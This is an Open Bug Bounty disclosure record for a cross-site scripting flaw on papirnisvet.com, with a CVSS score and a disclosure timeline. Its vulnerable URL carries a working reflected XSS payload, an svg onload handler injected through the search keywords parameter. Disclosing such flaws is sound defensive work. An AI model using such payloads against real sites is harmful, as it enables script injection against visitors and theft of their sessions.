papirnisvet.com XSS vulnerability

2017-11-30T10:22:00
ID OBB:444368
Type openbugbounty
Reporter Rashed_Naamani
Modified 2018-02-28T10:22:00

Description

Open Bug Bounty ID: OBB-444368

Description| Value
---|---
Affected Website:| papirnisvet.com
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.papirnisvet.com/search.php?data[page]=5&action=search&data[category_id]=&data[manuf_id]=&data[keywords]=%27%22%3E%3Csvg%2Fonload%3Dconfirm(%2FOPENBUGBOUNTY%2F)%3E&submit[search]=+Tra%C5%BEi+&data[order]=&data[product][1209]=&data[product][5302]=&data[product][1224]=&data[product][5301]=&data[product][4427]=&data[product][4255]=&data[product][1271]=&data[product][1272]=&data[product][1273]=&data[product][1274]=&data[product][1275]=&data[product][1276]=&data[product][1278]=&data[product][1279]=&data[product][1280]=&data[product][1281]=&data[product][1303]=&data[product][1304]=&data[product][5300]=&data[product][5299]=&data[product][1330]=&data[product][3602]=&data[product][5298]=&data[product][5297]=&data[product][5713]=&data[product][5666]=&data[product][3879]=&data[product][1371]=&data[product][3878]=&data[product][3528]=&data[product][1377]=&data[product][1383]=&data[product][1384]=&data[product][1385]=&data[product][1386]=&data[product][1387]=&data[product][1388]=&data[product][1389]=&data[product][1390]=&data[product][1391]=&data[product][4203]=&data[product][1395]=&data[product][1396]=&data[product][1397]=&data[product][1402]=&data[product][1403]=&data[product][1406]=&data[product][1407]=&data[product][1409]=&data[product][1410]=&data[product][1414]=&data[product][1415]=&data[product][3552]=&data[product][3544]=&data[product][1440]=&data[product][1441]=&data[product][5296]=&data[product][1447]=&data[product][1448]=&data[product][1454]=&data[product][1456]=&data[product][1457]=&data[product][1460]=&data[product][1461]=&data[product][5283]=&data[product][5284]=&data[product][3680]=&data[product][4220]=&data[product][3873]=&data[product][4687]=&data[product][1498]=&data[product][1499]=&data[product][1500]=&data[product][3679]=&data[product][1512]=&data[product][1513]=&data[product][1520]=&data[product][1521]=&data[product][1522]=&data[product][5355]=&data[product][5347]=&data[product][1529]=&data[product][1531]=&data[product][1536]=&data[product][1537]=&data[product][1542]=&data[product][1543]=&data[product][1544]=&data[product][1546]=&data[product][5704]=&data[product][5295]=&data[product][3147]=

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 30 November, 2017 10:22 GMT
Vulnerability Verified:| 30 November, 2017 10:24 GMT
Website Operator Notified:| 30 November, 2017 10:24 GMT
Vulnerability Published:| 30 November, 2017 10:24 GMT [without any technical details]
Public Disclosure:| 28 February, 2018 10:22 GMT